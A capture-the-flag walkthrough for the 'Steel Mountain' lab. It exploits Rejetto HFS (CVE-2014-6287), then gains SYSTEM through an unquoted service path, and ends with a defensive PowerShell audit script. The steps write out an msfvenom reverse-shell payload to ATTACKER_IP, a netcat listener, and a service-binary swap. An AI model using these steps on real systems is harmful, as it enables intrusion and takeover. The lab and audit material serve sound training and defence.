Steel Mountain

Tasks:

  1. Introduction:
    1. Visit the IP in a browser, download the picture and reverse image search it in Google - Bill Harper
  2. Initial Access:
    1. Run nmap -sC -sV -T5 <ip> and answer the question; visiting port 8080 shows the server is running Rejetto HTTP File Server version 2.3
    2. Search Exploit-DB for rejetto and find the CVE - CVE-2014-6287
    3. Search in msfconsole for the exploit, use exploit/windows/http/rejetto_hfs_exec, set RHOSTS and RPORT to the victim's details and run it to gain a meterpreter shell. Use shell to switch to cmd, go to Bill's desktop, find user.txt and submit it.
  3. Privilege Escalation:
    1. Upload PowerUp.ps1 from meterpreter.
    2. Run load powershell and then powershell_shell to get a PowerShell prompt.
    3. Execute ./PowerUp.ps1 and run Invoke-AllChecks - AdvancedSystemCareService9 has an unquoted service path with a writable directory. Stop the service using sc stop AdvancedSystemCareService9.
    4. Generate a malicious exe with msfvenom -p windows/shell_reverse_tcp -e x86/shikata_ga_nai LHOST=ATTACKER_IP LPORT=1337 -f exe -o ASCService.exe
    5. Copy the malicious binary to the victim machine and replace the binary in the service path.
    6. Start a netcat listener on the attacker machine - nc -nvlp 1337
    7. Start the service on the victim machine using sc start AdvancedSystemCareService9
    8. Check the netcat terminal - you have root access. Go to the Administrator desktop, find root.txt and submit the root flag!
  4. Access and Escalation Without Metasploit:
    1. Instead of meterpreter, use the Exploit-DB code: host ncat.exe on port 80 using Python's SimpleHTTPServer and gain a shell.
    2. Copy the winPEAS binary to the victim using certutil or any other technique and run it - you will get the same result, that AdvancedSystemCareService9 has an unquoted service path with a writable directory.
    3. Now proceed from the msfvenom payload generation as done in task 3 to get root.
    4. Get-Service is used to find service names.
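The unquoted service path that PowerUp and winPEAS report in tasks 3 and 4 can be audited (and fixed) without those tools. The script below is an added example, not part of the room or of PowerUp/winPEAS: it enumerates services with an unquoted path containing a space, checks which of the directories the service control manager would probe are writable by broad groups, and prints the sc.exe command that quotes the path. The group list and the write-bit mask are assumptions chosen for this example.

```powershell
# Added audit script (not from the room, PowerUp or winPEAS). Run from an elevated
# PowerShell prompt on the host being audited; the FixCommand is meant for cmd.exe.

# Low-privilege identities whose write access on a probed directory is a finding (assumption)
$BroadGroups = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# CreateFiles (0x2) plus the GENERIC_WRITE / GENERIC_ALL bits inherited ACEs often carry
$WriteBits = 0x2 -bor 0x40000000 -bor 0x10000000

function Get-BroadWriters {
    param([string]$Directory)
    $acl = Get-Acl -LiteralPath $Directory -ErrorAction SilentlyContinue
    if (-not $acl) { return @() }
    $acl.Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and
                       $BroadGroups -contains $_.IdentityReference.Value -and
                       ([int]$_.FileSystemRights -band $WriteBits) -ne 0 } |
        ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique
}

function Get-UnquotedServicePath {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = $svc.PathName
        if (-not $path -or $path.StartsWith('"')) { continue }
        # Keep only the executable portion; drop any arguments that follow the .exe
        $exe = if ($path -match '^(.*?\.exe)') { $Matches[1] } else { $path }
        # No space means no ambiguity; C:\Windows\ paths are skipped as noise, like PowerUp does
        if ($exe -notmatch '\s' -or $exe -match '^[A-Za-z]:\\Windows\\') { continue }
        # Each space is a point where SCM may try a shorter "<prefix>.exe" first,
        # so the parent directory of every prefix is a directory worth checking
        $parts = $exe -split ' '
        $dirs = for ($i = 1; $i -lt $parts.Count; $i++) {
            Split-Path -Path ($parts[0..($i - 1)] -join ' ') -Parent
        }
        $dirs = $dirs | Where-Object { $_ -and (Test-Path -LiteralPath $_) } | Sort-Object -Unique
        foreach ($dir in $dirs) {
            $writers = Get-BroadWriters -Directory $dir
            if ($writers) {
                [pscustomobject]@{
                    Service     = $svc.Name
                    RunsAs      = $svc.StartName
                    PathName    = $path
                    WritableDir = $dir
                    WritableBy  = ($writers -join ', ')
                    FixCommand  = 'sc.exe config "{0}" binPath= "\"{1}\""' -f $svc.Name, $exe
                }
            }
        }
    }
}

Get-UnquotedServicePath | Format-List
```

On the room's target this reports AdvancedSystemCareService9 with the writable directory under its path; applying FixCommand (and tightening the directory ACL) removes the escalation path.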
